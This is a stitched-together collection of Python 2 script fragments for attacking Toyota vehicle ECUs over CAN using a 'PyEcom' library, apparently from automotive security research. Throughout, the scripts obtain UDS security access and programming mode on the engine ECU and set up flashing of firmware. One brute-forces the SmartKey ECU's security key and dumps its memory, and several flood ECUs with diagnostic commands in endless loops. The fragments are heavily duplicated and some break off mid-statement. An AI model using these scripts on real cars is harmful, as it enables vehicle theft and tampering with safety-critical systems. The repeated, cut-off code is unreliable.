ECU = 0x7E0 #do security access ret = ecom.security_access(ECU) if ret == False: print "[!] [0x%04X] Security Access: FAILURE" % (ECU) sys.exit(1) print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes for i in range(0, 3): ret = ecom.send_iso_tp_data(0x720, [0xA0, 0x27]) #Grequires the to be in half-on state (power on, engine off) #Failure to be in the required mode will result in diagnostic session failing ret = ecom.diagnostic_session(ECU, [0x10, 0x02]) if ret == False: print "[!] [0x%04X] Programming Mode: Failure" % (ECU) sys.exit(1) print "[*] [0x%04X] Programming Mode: Success" % (ECU) ## for ecu_num, ecu_name in PriusECU.iteritems(): ## print "Trying security access for %s" % (ecu_name) ## #security access ## ret = ecom.security_access(ecu_num)
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1,37440) LOOPER = 0 SETSPEED = 62 SFFLINE = "IDH: 07, IDL: C0, Len: 08, Data: 04 30 01 00 02 00 00 00" SFFArray = SFFMessage * 1 SFFS = SFFArray() ecom.mydll.DbgLineToSFF(SFFLINE, pointer(SFFS[0])) #if(SETSPEED < 200): # SETSPEED = SETSPEED * 161 #SFFS[0].data[0] = (SETSPEED >> 8) & 0xFF; #SFFS[0].data[1] = SETSPEED & 0xFF; #ecom.mydll.FixChecksum(pointer(SFFS[0])) while(1): ecom.send_iso_tp_data(0x7C0, [0x30, 0x01, 0x00, 0x08])
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1, 37440) #ecom.open_device(1,0) ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01]) time.sleep(3) ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x02]) #read one message (should contain payload of: 0x08) #sff = pointer(SFFMessage()) #ecom.mydll.DbgLineToSFF("IDH: 03, IDL: 44, Len: 08, Data: FF 7F 00 00 00 08 00 D5", sff) #ret = ecom.send_iso_tp_data(0x781, [0x3E]) #ecom.mydll.write_messages_from_file(ecom.handle, "input.dat") #ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01]) #ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C) #ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat") #ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C) #ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
from PyEcom import * from config import * import time, struct, sys if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0, 1) ECU = 0x7E0 #Is CPU? ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) #???? ret = ecom.send_iso_tp_data(ECU, [0x13, 0x80]) #Get VIN ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) ret = ecom.security_access(ECU) if ret: print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes for i in range(0, 3):
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom("Debug\\ecomcat_api") ecom.open_device(1, 37440) # ecom.open_device(1,0) ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01]) time.sleep(3) ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x02]) # read one message (should contain payload of: 0x08) # sff = pointer(SFFMessage()) # ecom.mydll.DbgLineToSFF("IDH: 03, IDL: 44, Len: 08, Data: FF 7F 00 00 00 08 00 D5", sff) # ret = ecom.send_iso_tp_data(0x781, [0x3E]) # ecom.mydll.write_messages_from_file(ecom.handle, "input.dat") # ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01]) # ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C) # ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat") # ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C) # ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
target_data = nbo_int_to_bytearr(0xBC1F6FEF) if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0, 1) PREAMBLE = False #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) #do security access ret = ecom.security_access(ECU) if ret == False: print "[!] [0x%04X] Security Access: FAILURE" % (ECU) sys.exit(1) print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes
ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0,1) #Set this to False if flashing fails and the script needs re-run PREAMBLE = False #flash binary f = open("toyota_ecm.bin", "rb") #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) #do security access ret = ecom.security_access(ECU) if ret == False: print "[!] [0x%04X] Security Access: FAILURE" % (ECU) sys.exit(1) print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1, 37440) LOOPER = 0 SETSPEED = 62 SFFLINE = "IDH: 07, IDL: C0, Len: 08, Data: 04 30 01 00 02 00 00 00" SFFArray = SFFMessage * 1 SFFS = SFFArray() ecom.mydll.DbgLineToSFF(SFFLINE, pointer(SFFS[0])) #if(SETSPEED < 200): # SETSPEED = SETSPEED * 161 #SFFS[0].data[0] = (SETSPEED >> 8) & 0xFF; #SFFS[0].data[1] = SETSPEED & 0xFF; #ecom.mydll.FixChecksum(pointer(SFFS[0])) while (1): ecom.send_iso_tp_data(0x7C0, [0x30, 0x01, 0x00, 0x08])
ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0, 1) #Set this to False if flashing fails and the script needs re-run PREAMBLE = False #flash binary f = open("toyota_ecm.bin", "rb") #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) #do security access ret = ecom.security_access(ECU) if ret == False: print "[!] [0x%04X] Security Access: FAILURE" % (ECU) sys.exit(1) print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes
from PyEcom import * from config import * import time, struct, sys if __name__ == "__main__": ecom = PyEcom("Debug\\ecomcat_api") ecom.open_device(0, 1) ECU = 0x7E0 # Is CPU? ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) # Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) # ???? ret = ecom.send_iso_tp_data(ECU, [0x13, 0x80]) # Get VIN ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) ret = ecom.security_access(ECU) if ret: print "[*] [0x%04X] Security Access: Success" % (ECU) # Unsure but this happens 3x in the capture before diag programming mode # I think this may have to do w/ tellin other ECUs the one being reprogrammed # is going offline for a while and DO NOT set DTC codes for i in range(0, 3):
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1,35916) #Engine ECU ECU = 0x7E0 for i in range(0, 11): print "Attempt %d" % (i) resp = ecom.send_iso_tp_data(ECU, ecom.get_security_access_payload(ECU), None) if not resp or len(resp) == 0: print "No Response" seed = resp[2] << 24 | resp[3] << 16 | resp[4] << 8 | resp[5] #obviously incorrect key = [0,0,0,0] key_data = [0x27, 0x02, key[0], key[1], key[2], key[3]] key_resp = ecom.send_iso_tp_data(ECU, key_data, None) err = ecom.get_error(key_resp) if err != 0x00: print "Error: %s" % (NegRespErrStr(err))
target_data = nbo_int_to_bytearr(0xBC1F6FEF) if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0,1) PREAMBLE = False #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) #do security access ret = ecom.security_access(ECU) if ret == False: print "[!] [0x%04X] Security Access: FAILURE" % (ECU) sys.exit(1) print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes
if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1,35916) ECU = 0x7E0 #do security access ret = ecom.security_access(ECU) if ret == False: print "[!] [0x%04X] Security Access: FAILURE" % (ECU) else: print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes for i in range(0, 3): ret = ecom.send_iso_tp_data(0x720, [0xA0, 0x27]) ret = ecom.diagnostic_session(ECU, [0x10, 0x02]) if ret == False: print "[!] [0x%04X] Programming Mode: FAILURE" % (ECU) else: print "[*] [0x%04X] Programming Mode: Sucess" % (ECU) for i in range(0, 10): ecom.send_iso_tp_data(0x7E0, [0x30, 0x1C, 0x00, 0x0F, 0xA5, 0x01])
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1, 35916) #Engine ECU ECU = 0x7E0 for i in range(0, 11): print "Attempt %d" % (i) resp = ecom.send_iso_tp_data(ECU, ecom.get_security_access_payload(ECU), None) if not resp or len(resp) == 0: print "No Response" seed = resp[2] << 24 | resp[3] << 16 | resp[4] << 8 | resp[5] #obviously incorrect key = [0, 0, 0, 0] key_data = [0x27, 0x02, key[0], key[1], key[2], key[3]] key_resp = ecom.send_iso_tp_data(ECU, key_data, None) err = ecom.get_error(key_resp) if err != 0x00:
self.address = address self.write_address = write_address self.length = length if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1, 35916) ECU = 0x750 #SmartKey 0x750 [0xB5] seems to return 34 when ret[2] - 0xAB for i in range(0, 1000): ret = ecom.send_iso_tp_data(0x750, [0x27, 0x01], 0x40) #key = (ret[2] - 0xAB) & 0xFF #key = (~ret[2] + 1) & 0xFF key = i & 0xFF ret = ecom.send_iso_tp_data(0x750, [0x27, 0x02, key], 0x40) if ret[2] != 0x35: print "New Error: %d %d" % (key, i) break ret = ecom.request_upload_14229(ECU, 0x01, 0x44, 0x0000F000, 0x00000001, 0x40) ret = ecom.request_upload_14229(ECU, 0x01, 0x33, 0x0000F000, 0x00000001, 0x40) ret = ecom.request_upload_14229(ECU, 0x01, 0x24, 0x0000F000, 0x00000001, 0x40)
def __init__(self, address, write_address, length): self.address = address self.write_address = write_address self.length = length if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1,35916) ECU = 0x750 #SmartKey 0x750 [0xB5] seems to return 34 when ret[2] - 0xAB for i in range(0, 1000): ret = ecom.send_iso_tp_data(0x750, [0x27, 0x01], 0x40) #key = (ret[2] - 0xAB) & 0xFF #key = (~ret[2] + 1) & 0xFF key = i & 0xFF ret = ecom.send_iso_tp_data(0x750, [0x27, 0x02, key], 0x40) if ret[2] != 0x35: print "New Error: %d %d" % (key, i) break ret = ecom.request_upload_14229(ECU, 0x01, 0x44, 0x0000F000, 0x00000001, 0x40) ret = ecom.request_upload_14229(ECU, 0x01, 0x33, 0x0000F000, 0x00000001, 0x40) ret = ecom.request_upload_14229(ECU, 0x01, 0x24, 0x0000F000, 0x00000001, 0x40) ret = ecom.request_upload_14229(ECU, 0x01, 0x22, 0x0000F000, 0x00000001, 0x40) ret = ecom.request_upload_14229(ECU, 0x01, 0x12, 0x0000F000, 0x00000001, 0x40)